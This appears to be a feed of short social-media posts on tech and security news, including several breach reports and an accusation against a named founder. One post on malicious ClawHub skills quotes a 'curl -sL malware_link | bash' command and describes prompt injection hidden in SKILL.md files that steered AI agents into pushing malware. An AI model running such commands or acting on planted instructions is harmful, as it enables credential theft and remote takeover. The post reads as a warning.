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Looks like a modern version of Packet tracer/GNS3 🤣 Only 6 USD though. Would you try it?
Alguien ha creado el juego más adictivo para aprender redes de centros de datos. Esta increíblee! Se llama Data Center; cuesta 6 dólares y empiezas con el suelo completamente vacío: compras racks, montas servidores y tiendes cada cable a mano. Lo más brutal es que el tráfico de cada cliente se visualiza como esferas de colores que circulan por tus cables, literalmente ves los cuellos de botella en tiempo real. 190 reseñas en 48 horas, gente con equipos equipados con tarjetas RTX 4090 está totalmente enganchada y divirtiéndose en un simulador de cableado de 6 dólares.
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i can spot a grifter from miles away. so i digged into the code to figure out if this is legit or not. guess i was right. ben is a crypto founder who runs some weird bitcoin lending platform, i was pretty sure he knows absolutely nothing about ai and memory so i tracked down the repo myself since i was curious. his website says he likes to build ai powered products and train local ai models? sure man, 80% of your github repo's are bitcoin related stuff. only one ai related project came up you forked in 2024. mempalace has 10k github stars, more than 1k forks but only.. 7 commits ? apparently the best memory layer to date? no git author history, no account connected to whoever wrote the code of this codebase. it doesn't add up.. the account who pushed the original repo, named: aya-thekeeper, under aya-thekeeper/mempal got deleted right after the repo got published. you paid a random guy named lu to build this shit out for you. ( "Written by Lu (DTL) — March 24, 2026. For: Ben." ) - benchmark md file. lu wrote the code. lu wrote the benchmarks. lu is nowhere in the readme. or mentioned in the github history? the git history then got squashed to one commit and published under milla jovovich? seriously? a actress? you say she is a great friend of yours, she has been building this project with you. she does this at night. yet she has.. 7 commits and only 2 active days in her entire github history? you paid an actress and a random guy to promote a product you know absolutely nothing about.
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🚨‼️ BREAKING: The source code of Swedish e-government services from CGI's "E-plattform" has been leaked. A threat actor sent us samples. Our initial analysis shows the breached repositories originate from an internal CGI GitLab instance. The leak exposes architecture, microservices, and configurations for Sweden's digital public infrastructure. Leaked files: ▪️ Database passwords ▪️ Email/SMTP passwords ▪️ Keystore/truststore passwords & key passwords ▪️ SHS credentials / keystore details ▪️ Signe portal credentials/config ▪️ Embedded Git credentials ▪️ CGI staff data Key components exposed: ▪️ Mina Engagemang: Frontend and backend code (me-portals) for citizen-facing apps and case management. ▪️ Signe & e-ID: E-signature portal configs, SAML/OpenSAML metadata (keyservice), and signing workflow templates. ▪️ Företrädarregister: Authorization registry services (foreg) governing who can legally represent organizations. ▪️ SHS Integration: Routing and config files (eintegration3) for secure inter-agency data exchange. The leaked repos contain .git/config files with embedded credentials, severely elevating the risk of lateral movement or further supply chain compromise. A major exposure of the trust anchors and identity routing powering Sweden's digital state.
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This my friends, is a role model
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CI/CD Pipeline Commands & Concepts - Cheat sheet
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‼️🇿🇲 A threat actor claims to have breached the Government of Zambia, allegedly affecting 15 million people across 34.1 million records totaling 500 GB. The exposed data reportedly includes full names, dates of birth, national IDs, phone numbers, emails, addresses down to village/ward level, household details, disability status, education levels, asset ownership, agricultural and livestock data, GPS coordinates, beneficiary status, and payment history.
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If you, like me lost your mouse visibility in your guest system do this: Shut down the VM. Press VM at the top -> Manage -> Change Hardware Compatibility. Select Workstation 16.x or above. Mine was at 8.. Then select Next and "Alter this virtual machine" then simply finish the wizard. Start the VM and enjoy having your mouse back 🐁
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the #1 most downloaded skill on OpenClaw marketplace was MALWARE it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server 1,184 malicious skills found, one attacker uploaded 677 packages ALONE OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins you install a skill, your AI agent gets new powers, this sounds great the problem? ClawHub let ANYONE publish with just a 1 week old github account attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command > to enable this feature please run: curl -sL malware_link | bash that one command installed Atomic Stealer on macOS it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1 this is npm supply chain attacks all over again except the package can THINK and has root access to your life
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🚨Personal data including $3.7bn in loan applications has been exposed affecting more than 440,000 Australians in a recent cybersecurity breach at a Sydney financial tech company
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🛑 Citizen Lab found Cellebrite tools used on a Kenyan activist’s phone while it was in police custody. Boniface Mwangi’s Samsung device was accessed in July 2025 and later returned without password protection. Full extraction could include messages, files, and passwords. The findings follow similar cases in Jordan. 🔗 Read → thehackernews.com/2026/02/ci…
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Replying to @Pirat_Nation
This issue should be fixed in Brave already
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YouTube is now hiding comments and video descriptions when an ad blocker is enabled. Also it seems like this affects some premium users. Meanwhile if you disable the blocker it brings the comments back instantly👀
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Finally, too bad for those who needs storage though x.com/i/status/2023807784165…

New report shows RAM prices are continuing to fall in Germany, U.S. trends less certain — SSDs and HDDs are more expensive than ever tomshardware.com/tech-indust…
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Still kinda hot tbh
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⚠️ Windows 11 KB5077181 Security Update Causing Some Devices to Restart in an Infinite Loop Source: cybersecuritynews.com/window… Microsoft's February 10, 2026, security update KB5077181 for Windows 11 versions 24H2 (build 26200.7840) and 25H2 (build 26100.7840) has triggered widespread reports of critical boot failures just days after deployment. Users describe devices entering infinite restart loops, often exceeding 15 cycles, preventing access to the desktop. This cumulative update delivers essential security fixes alongside quality improvements from prior releases like KB5074109. #cybersecuritynews #windows11
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During your pentest mission, please don’t make the same mistake I did. Add printer IPs to your exclusion list when running Nuclei. Otherwise, the printer will interpret every packet sent to port 9100 as a print job.
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